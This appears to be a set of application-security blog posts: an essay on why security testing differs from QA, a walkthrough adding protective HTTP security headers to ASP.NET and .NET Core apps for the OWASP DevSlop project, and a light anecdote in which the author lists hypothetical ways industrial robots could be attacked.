· Security Testing — a mix of manual and automated testing, using one or more tools, with the aim to find vulnerabilities within applications.

There are more types of testing, but I think you get the point.

Some or all of these types of testing can be used to verify that a product is of high quality, and security is just one part. Therefore, security testing and QA are not 'the same thing.'

3. Security testing ‘should be performed by QA’

For each one of the types of testing listed above a different skillset is required. All of them require patience, attention to detail, basic technical skills, and the ability to document what you have found in a way that the software developers will understand and be able to fix the issue(s). That is where the similarities end. Each one of these types of testing requires different experience, knowledge, and tools, often meaning you need to hire different resources to perform the different tasks. Also, we can’t concentrate on everything at once and still do a great job at each one of them.

Although theoretically you could find one person who is both skilled and experienced in all of these areas, it is rare, and that person would likely be costly to employ as a full-time resource. This is one reason that people hired for general software testing are not often also tasked with security testing. Another reason is that people who have the experience and skills to perform thorough and complete security testing are currently a rarity (there is a skills shortage), while as an industry we are lucky to have quite a number of skilled QA professionals, making them easier to hire and staff. Lastly, the amount of time, training and experience it takes to become a security tester is greater than for a general software tester.

Training on how to perform security testing is extremely expensive and difficult to find; it generally takes longer to learn as a skill than other types of testing; and there are fewer opportunities to get into that field, compared to QA. Thus it is more difficult to become a security tester than a general tester. Scarce resources, high demand and expensive training mean it costs significantly more to hire security testers than it does to hire general software testers.

All of these facts lead up to the reality that it is cost-prohibitive to staff your QA team with professionals who are skilled and experienced in both QA and security testing. This also means that you are creating a single point of failure for testing in your organization, which will not save you money in the long run.

#MSIgniteTheTour, Toronto, 2019

Another point on this topic: those who work in the security industry are likely to have a preference for their area of focus, security, and may be unwilling to perform other types of work outside their area of concentration (people who specialize generally want to work within their area of specialization, whenever possible, and security testing is a specialization).

4. ‘There’s no specific skillset’ required to do security testing versus QA.

First of all, I feel this statement is insulting to QA testers, as though they do not have a specific skillset that makes them good at what they do. I don't believe that to be true. I suspect that when people make this argument, it is out of frustration with our industry, because I honestly cannot fathom someone thinking that security testing does not require specific experience, training or skills; otherwise there would be no skills shortage and it would not be a high-paying job. Security testing is a specialization within the field of testing, just as there are specializations within any field, and by definition it requires more knowledge and training to form the skillset needed to do the job.

I do not intend to downplay the value of QA testing, only to explain that quality assurance is different from ensuring that a product is secure. I should also say that I feel that hacking is sometimes glorified in television, the media and our industry as a whole, in a way that isn’t logical to me. Security testing is very important, but I do not believe that hackers are superior to other professionals who work in IT. In fact, I choose to focus my career on AppSec, DevSecOps and other types of defence, because I truly believe that it is more important that we write secure code than we ‘hack all the things’. Security is so much more than just security testing (ethical hacking), it is secure design, secure coding, threat modelling, etc.

I feel comments like this (#4) are not based on facts, but feelings, and it’s difficult to debate with someone when that is the case.

It is okay if we disagree on this topic. Debate is good and healthy, and I would love to hear your feelings, thoughts and ideas in the comments.

At this point I’d like to remind you all that security is everybody’s job. Not only is it everyone’s responsibility to do their job in the most secure way they know how, but having many different people look at something with security in mind can help us find new and different problems that may have otherwise been missed.

For content like this and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!

Security Headers for ASP.Net and .Net CORE

Website report showing we received an A

For those who do not follow me or Franziska Bühler, we have an open source project together called OWASP DevSlop, in which we explore DevSecOps through writing vulnerable apps, creating pipelines, publishing proof of concepts, and documenting what we've learned on our YouTube Channel and our blogs. In this article we will explore adding security headers to our proof of concept website, DevSlop.co. This blog post is closely related to Franziska's post OWASP DevSlop's journey to TLS and Security Headers. If you like this one, read hers too. 🙂

Franziska Bühler and I installed several security headers during the OWASP DevSlop Show in Episodes 2.1 and 2.2. Unfortunately, we found out that .Net Core apps don't have a web.config, so the next time we published, it wiped out the beautiful headers we had added. Although that is not good news, it was another chance to learn, and it gave me a great excuse to finally write the Security Headers blog post that I have been promising. Here we go!

Our web.config looked so…. Empty.

Just now, I added back the headers but I added them to the startup.cs file in my .Net Core app, which you can watch here. Special thanks to Damien Bod for help with the .Net Core twist.

If you want in-depth details about what we did on the show and what each security header means, you should read Franziska’s blog post. She explains every step, and if you are trying to add security headers for the first time to your web.config (ASP.Net, not .Net CORE), you should definitely read it.

The new code for ASP.Net in your web.config looks like this:

<!-- Start Security Headers -->
<httpProtocol>
  <customHeaders>
    <add name="X-XSS-Protection" value="1; mode=block"/>
    <add name="Content-Security-Policy" value="default-src 'self'"/>
    <add name="X-Frame-Options" value="SAMEORIGIN"/>
    <add name="X-Content-Type-Options" value="nosniff"/>
    <add name="Referrer-Policy" value="strict-origin-when-cross-origin"/>
    <remove name="X-Powered-By"/>
  </customHeaders>
</httpProtocol>
<!-- End Security Headers -->

Our new-and-improved Web.Config!

And the new code for my startup.cs (.Net CORE) looks like this (thank you, Damien Bod):

//Security headers make me happy
app.UseHsts(hsts => hsts.MaxAge(365).IncludeSubdomains());
app.UseXContentTypeOptions();
app.UseReferrerPolicy(opts => opts.NoReferrer());
app.UseXXssProtection(options => options.EnabledWithBlockMode());
app.UseXfo(options => options.Deny());

app.UseCsp(opts => opts
.BlockAllMixedContent()
.StyleSources(s => s.Self())
.StyleSources(s => s.UnsafeInline())
.FontSources(s => s.Self())
.FormActions(s => s.Self())
.FrameAncestors(s => s.Self())
.ImageSources(s => s.Self())
.ScriptSources(s => s.Self())
);
//End Security Headers

Our beautiful security headers!

In future episodes we will also add:

  • Secure settings for our cookies
  • X-Permitted-Cross-Domain-Policies: none
  • Expect-CT: (not currently supported by our provider)
  • Feature-Policy: camera ‘none’; microphone ‘none’; speaker ‘self’; vibrate ‘none’; geolocation ‘none’; accelerometer ‘none’; ambient-light-sensor ‘none’; autoplay ‘none’; encrypted-media ‘none’; gyroscope ‘none’; magnetometer ‘none’; midi ‘none’; payment ‘none’; picture-in-picture ‘none’; usb ‘none’; vr ‘none’; fullscreen *;

For more information on all of these security headers, I strongly suggest you read the OWASP Security Headers Guidance.

We now have good marks from all of the important places (https://securityheaders.com, https://www.ssllabs.com and http://hardenize.com), but hope to improve our score even further.

For more information, watch our show! Every Sunday from 1–2 pm EDT, on Mixer and Twitch, and recordings are available later on our YouTube channel.

Please use every security header that is available and applicable to you.

For content like this and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!

Hacking Robots and Eating Sushi

Jesse Hones and his robots

I recently had dinner with an old friend, Jesse Hones, the Engineering Manager of Systems / Senior Software Developer at Aprel. I remember when we first met he explained that he designed and programmed robots to measure radio frequencies at extremely precise levels. Fast forward a decade: I am an ethical hacker and he is designing more complex robots than ever before. So I did what anyone would do: I asked him to come on the OWASP DevSlop show and talk about hacking robots.

Jesse Hones and one of his many robots.

His answer was “Not yet. I can’t tell you what all the loopholes are, because I still need those to get my job done.”

Interest piqued.

He explained that previously robot firmware was all custom; each system was its own unique snowflake. Like custom software today, it was rife with vulnerabilities, but you could only hack them one system at a time. Recently this has changed, he explained: things are standardizing and many robots use the same components, which all run the same firmware. I asked if this was like Windows XP back in the day, in that almost everyone was running it, so when a bug was discovered *every* system was vulnerable. He said yes.

But Jesse is a developer, not a security person, so he looks at it with the “I need to make sure this runs properly” lens, not the “I want to make this robot do my bidding!” viewpoint of an ethical hacker.

More of Jesse’s robots.

Obviously, I had to threat model the situation immediately. Poor Jesse.

Me: What if malware is created that stops production for all affected robots?

Jesse: Yes, this would be costly.

Me: What about ransomware?

Jesse: <unhappy face>

Me: What if someone takes over the robots and has them implant something in every 20th chip they make, to spy on the users? As a supply chain attack?

Jesse: Yes, that would be very bad. However this could change soon; we may be switching over to Windows Embedded.

Me: Okay…. But what if a company used robots Stuxnet style and slowly sabotaged their competitors? So they could never quite finish their R&D on a product? Meanwhile stealing their ideas? Think Stuxnet meets Schindler’s List.

Jesse: …

Me: What if someone uses them to mine bitcoin? Robot Crypto Pirates!

Jesse: I guess tha-

Me: What if robots become the weak point of most networks and are used regularly as pivot points by hackers?

At this point Jesse has resorted to quietly waiting for me to calm down. I look at him.

Me: What if a robot murders someone?

Jesse: That would be the end. The industry could not survive. That cannot be allowed to happen. Ever.

Sounds like we need more robot hackers.

For content and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!